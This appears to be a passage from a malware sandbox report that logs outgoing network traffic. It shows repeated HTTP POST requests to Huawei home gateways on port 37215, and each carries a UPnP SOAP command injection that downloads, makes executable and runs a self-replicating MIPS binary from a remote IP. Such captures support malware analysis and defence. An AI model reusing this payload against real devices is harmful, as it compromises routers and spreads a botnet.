                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.493464947 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    15192.168.2.1457298197.29.115.6537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.093816042 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.446922064 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    16192.168.2.1451428195.37.174.20037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.093816996 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.446922064 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    17192.168.2.1436194157.118.62.9037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.093816996 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.446922064 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    18192.168.2.1438652197.134.93.22537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.094995975 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.494684935 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    19192.168.2.144067614.126.26.25037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.104423046 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
